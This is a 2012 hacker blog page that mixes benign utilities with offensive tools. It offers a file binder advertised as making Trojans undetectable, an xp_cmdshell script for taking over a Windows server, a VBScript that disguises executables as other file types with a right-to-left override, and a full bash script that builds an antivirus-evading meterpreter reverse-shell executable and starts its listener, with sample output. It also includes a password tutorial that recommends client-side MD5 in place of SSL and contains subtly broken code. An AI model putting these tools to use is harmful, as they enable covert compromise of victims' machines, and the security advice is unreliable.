Breaking News
Loading...
  • My Software(s)
  • Hack News
  • Downloads

My Softwares

Hack News

Downloads

Recent Post

mFileBinder | Advanced File Binder by MAK

mFileBinder | Advanced File Binder by MAK

mFileBinder is an advanced file binder which binds multiple file of any type and merges into a single executable file.
mFileBinder uses rijndael encryption algorithm to encrypt the file which can make Virus / Trojans Fully Undetectable.
Set the drop location of all files and set the execution mode(Background,Foreground) of each file.
Predefined set of ICON Package is included set your desired icon.
Silently extracts and sequentially execute files.

Screen Shot :-

mFileBinder Advanced file binder
Download Link 1    Download Link 2
Youtube-2-mp3 >> Convert & Download Youtube audio as mp3

Youtube-2-mp3 >> Convert & Download Youtube audio as mp3

Now download your favourite music from youtube as mp3.
Youtube-2-mp3 converts the audio-track of your video-file to mp3.
The conversion hardly takes 10-20 seconds , the only thing you need is a YouTube URL.
The conversion will be performed in a high quality mode with a bitrate of at least 128 kBit/s.
Youtube-2-mp3 also monitors the clipboard data as soon as you copy any YouTube link it will automatically add it to the download list.

Screenshot :-
Youtube-2-mp3 by DJ MAK
Youtube-2-mp3 by MAK
Download Link 1    Download Link 2

Demonstration :-

Folder Locker v2.0

Folder Locker v2.0

Folder Locker Now with advanced option :)
Can convert and lock folders to the following types :-
Network Connection , Printer and Fax , My Computer , Programs Folder , Administrator Tools.
(Note : - Requires .NET Framework 2.0)
MAK's Folder Locker
MAK's Folder Locker

Shortcut menu in all folder's



Demonstration :-


Themed DataGridView For .NET Developers

Themed DataGridView For .NET Developers


As we know a DataGridView control provides a customizable table for displaying data.
This control is designed to be a complete solution for displaying tabular data with Windows Forms.
Also the DataGridView class allows us to customization of cells, rows, columns, and borders through the use of its properties.

So i have used and extended the properties of DataGridView and made a user control with predefined set of 8 Themes in it.so that the boring look of the control can be changed to some cool looks :)

You can set the theme of the DataGridView by GridTheme Property:-

Datagridview theme









Download ThemedDataGridView Control

Here is the screenshot for all 8 Themes :-

ThemedDataGridView

1) Orange


Gridview themes
2) Expression

Theme for datagridview
3) Dark1

Datagridview themes
4) Dark2

themes for gridview
5) Dark3

ThemedDataGridView
6) Accent1

datagridview themes
7) Accent2

.net datagridview
8) Accent3
Hacking Server 2008 with MS SQL Server

Hacking Server 2008 with MS SQL Server

Its a short tutorial on owning a windows server with MS Sql Server [xp_cmdshell].
In this scenario iam not using any hacking tools.
All i have is password for 'sa' account of SQL Server.

 

Script to Enable xp_cmdshell in MS SQL Server :-

-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO



Extension Spoofer (VBscript & Exe)

Extension Spoofer (VBscript & Exe)

Spoof Extensions of any file in Win 7 using the following vbscript Code

Code :

'========================================================'
' '
' EXTENSION SPOOFER '
' CODED BY DJ MAK '
' http://hackwithmak.tk '
'========================================================'
Call Spoof
Sub Spoof()
dim filePath,fileName,exten,FileLen,revExten,dest,NewFileName
set fs = CreateObject("Scripting.FileSystemObject")
filePath=inputbox("Enter The FilePath")
exten=inputbox("Enter the Extension to spoof" & vbCrlf & _
"Example : .jpg, .mp3 , .avi , etc..")
fileName=fs.GetFileName(filepath)
filePath=fs.GetParentFolderName(filepath)
FileLen=Len(fileName)-4
Dim spclChar
spclChar = ChrW(8238)
revExten=StrReverse(exten)
NewFileName=inputbox("Enter the new file name max 5 chars")
dest=NewFileName & spclChar & revExten & mid(fileName,FileLen+2)

fs.copyFile filePath & "\" & Filename,filePath & "\" & dest
msgbox "Extension Spoofed Successfully!!",vbInformation
end sub

Open notepad paste the above script and Save it as ExtSpoofer.vbs
or Download the Exe

Metasploit FUD Payload generator

Metasploit FUD Payload generator

Based on coresec.org article to create fully undetectable metasploit payload,
i have modified the to payload to work with both WAN and LAN IP.
So it is possible to exploit a system outside a network :)

Code :

#!/bin/bash
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " By Astr0baby 2011 Modified By DJ MAK 2012 "
echo " With some Randomic gravy and sauce to bypass Antivirus "
echo " For Automatic Teensy programming and deployment "
echo "************************************************************"

Code :

rm -rf ShellCode

echo -e "1) LanIP \n2) WanIP?"
read netchoice
case $netchoice in
1) echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ? \c"
read interface
IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
2) echo -e "======Getting your WAN IP========="
IP=`wget -q -O - http://checkip.dyndns.org | cut -d ':' -f2 | cut -d '<' -f1 | cut -d ' ' -f2`;;
esac
echo $IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c $enumber -t raw | msfencode -e x86/jmp_call_additive -c $enumber -t raw | msfencode -e x86/call4_dword_xor -c $enumber -t raw | msfencode -e x86/shikata_ga_nai -c $enumber > test.c
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include " >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx
strip --strip-debug $filex
cd ..
echo " starting the meterpreter listener..."
sleep 2
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript='migrate.rb -n explorer.exe' E

Save the file as fud.sh
And set the permission to Execute :
Code :

[email protected]:~/Desktop# chmod +x fud.sh
[email protected]:~/Desktop# ./fud.sh
************************************************************
Automatic shellcode generator - FOR METASPLOIT
By Astr0baby 2011 Modified By DJ MAK 2012
With some Randomic gravy and sauce to bypass Antivirus
For Automatic Teensy programming and deployment
************************************************************
1) LanIP
2) WanIP?
2
======Getting your WAN IP=========
114.79.135.104
What Port Number are we gonna listen to? : 5676
Please enter a random seed number 1-10000, the larger the number the
larger the resulting executable : 1000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)

[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)

[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)

[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)

[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)

[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)

[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)

[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)

[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)

[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)

31963.exe ...generated in ShellCode subfolder
31963.exe sha1checksum is..675ee8fa2daf8533fe2c2ebe941de78948fa776a 31963.exe
starting the meterpreter listener...

As soon as the the payload is executed on the Victims machine
it will automatically migrate to explorer.exe Process

dj mak

The payload is almost undetectable from most of the virus Engines!!!!

SQLI HUNTER 1.0

SQLI HUNTER 1.0


sqli hunter

SQLI Hunter is an automation tool to scan for an Sql Injection vulnerability in a website.
It automates the search of sqli vulnerable links from Google using google dorks!
 
Current version supports only 96 results.

SQLI Hunter can also find admin page of any website by using some predefined admin page lists.


  Show/Hide Screen Shots 
sqli hunter
sqli hunter
sqli hunter
sqli hunter
sqli hunter
sqli hunter

Download Here (Requires .NET Framework 3.5) OR
Download Portable

Protect Your Users Passwords without an Expensive SSL Certificate

Protect Your Users Passwords without an Expensive SSL Certificate


Personal information security, one of the hottest topics on the lips of web professionals across the globe. How do we stop people not only hacking our sites and causing us inconvenience, but also how do we stop people accessing our users' personal information? Right now there is one major answer to these questions, SSL (secure socket layer). Proven technology which has fueled a boom in online transactions, allowing people to buy anything from dressing gowns to airplanes. However, SSL certificates can be costly to smaller web masters. These millions of people who offer a free service to the world hoping that their advertising may at least pay their hosting. Here is a small scale solution which can provide these people with an extra layer of security.

WARNING (Please Read)

This is a SMALL SCALE solution not intended for the communication of private information. This type of security should NOT be used on e-commerce applications or anything which deals with personal information of any kind. This is suitable only for small sites with log in areas which if compromised will not cause the leakage of valuable data.

How Can I Secure my Users Without SSL?

A large number of user on the web accounts which are compromised are the result of package sniffing. People who set up their servers to monitor packets which pass by for potentially valuable information. When using SSL this is not an issue since the encryption makes the data illegible to the sniffer but when using an open connection someone can easily pick up on an unencrypted user name and password. The key to SSL is that the data is encrypted before transport and we need to do that as regularly as we can. As web developers on the only client side resource available is JavaScript, executing on the users machine. We can use this (when enabled) to encrypt our data for us before it is sent to the server. Ofcourse this will only work when JavaScript is enabled but it is better that it is sometimes present rather than not there at all.

How Can I Implement this JavaScript Encryption?

You could argue that there are many ways to do this and this is only one. JavaScript does not have the likes of MD5 built in which can be used in other technologies to one-way encrypt data. However, it is possible to access it in the form of an user defined function. The best one I found for this was here : http://pajhome.org.uk/crypt/md5/index.html.
Once you have MD5 working on both server and client, you can use it to hash the password of your user when they submit the form just prior to it being posted in a HTTP request across the world. When your server receives this hashed password it can compare it to its records and authenticate it since you should be storing encrypted passwords anyway. Storing plain text passwords is EXTREMELY bad practice and should be avoided at all times. If someone were to hack your database your users would be in a whole lot of trouble and it would be all YOUR fault. People often use the same password on different sites so they could lose there account on more than just your website.

But How Do I Know if the Password has been Encrypted Client Side?

I see that there are two ways to do this. You can create a hidden input field in the DOM before submission, which when present in the post request can signify that JavaScript was enabled at the time of log in. There is also the alternative of limiting your users to passwords less than 32 characters (the length of an MD5 hash). This way you know if the password they submit is 32 characters long it has already been hashed.

Extra Server-side Security Pre-cautions

If a packet sniffer were to pick up on your newly hashed password and submit it themselves, they could easily bypass this new security making it pointless. To combat this I would recommend using time based hashing routines on the server to determine when the initial form was rendered, and timing that form out meaning it can not be submitted after a certain period of time. We can implement this by client-side hashing the password once, and then hashing it with a value given by the server concatenated on the end a second time. This value can be worked out by an algorithm on the server based on the time and can change every 5-10 minutes. At the server you can look up the users screen name in the database and hash their (already hashed) password with values which would still be valid to see if you can attain a match. If so, let them in, if not, ask them to try again. The packet sniffers could see this time based value sent by the server but if its ambiguous enough they will not be able to work out how it is calculated on the server, meaning they will have to be pretty quick to hack in.

Conclusion

There it is, user authentication encryption without a costly SSL certificate. I will re-iterate that this is not a proven solution, not all people will be able to use it since they may not have JavaScript which renders it useless. You must still offer a non-JavaScript solution which works the traditional way to meet standards and to offer your site to as many people as possible. Always remember that your users deserve you to look at ideas like this to protect them since us, the developers, are the ones who have control of this data and its up to us to do the best we can with it.
Feel free to comment below if you have any ideas which could develop this further, or maybe you have tried it and have a story to tell. Please, no people saying how it is insecure and isn't a viable option. I've stated many times that its not the securest encryption method out there and that this is not suitable for use with private data but it is cheap, easy and works where possible, which is better than transmitting plain text.


Implementing the JavaScript encryption method in ASP.NET


Download this JavaScript file JavascriptEncryption.
add the reference of this file to your project.
Now create a javascript function for encrypting a string :

function CryptPass() {
var pass=document.getElementById('txtpass').value;
document.getElementById('txtpass').value=hex_md5(pass);
}


Now call this function on the client click of the Submit or Login Button 


Now you need to Compare the MD5 hash in the Server Code 
For Example :
If you want to validate password="123456"
Then call the makeMD5Hash Function in the server code


VB.NET
If txtpass.text=makeMD5Hash("123456") Then
        'Login Success
End If

Function makeMD5Hash(ByVal strToHash as String) as String
Dim strToHash As String
        Dim md5Obj As New Security.Cryptography.MD5CryptoServiceProvider
        Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash)
        bytesToHash = md5Obj.ComputeHash(bytesToHash)
        Dim strResult As String = ""
        For Each b As Byte In bytesToHash
            strResult += b.ToString("x2")
        Next
Return strResult
End Function



C#.NET
if (txtpass.text == makeMD5Hash("123456")) {
//Login Success


}
public string makeMD5Hash(string strToHash)
{
string strToHash = null;
System.Security.Cryptography.MD5CryptoServiceProvider md5Obj = new System.Security.Cryptography.MD5CryptoServiceProvider();
byte[] bytesToHash = System.Text.Encoding.ASCII.GetBytes(strToHash);
bytesToHash = md5Obj.ComputeHash(bytesToHash);
string strResult = "";
foreach (byte b in bytesToHash) {
strResult += b.ToString("x2");
}
return strResult;
}

Demo :


Copyright © 2012 HackWithMak All Right Reserved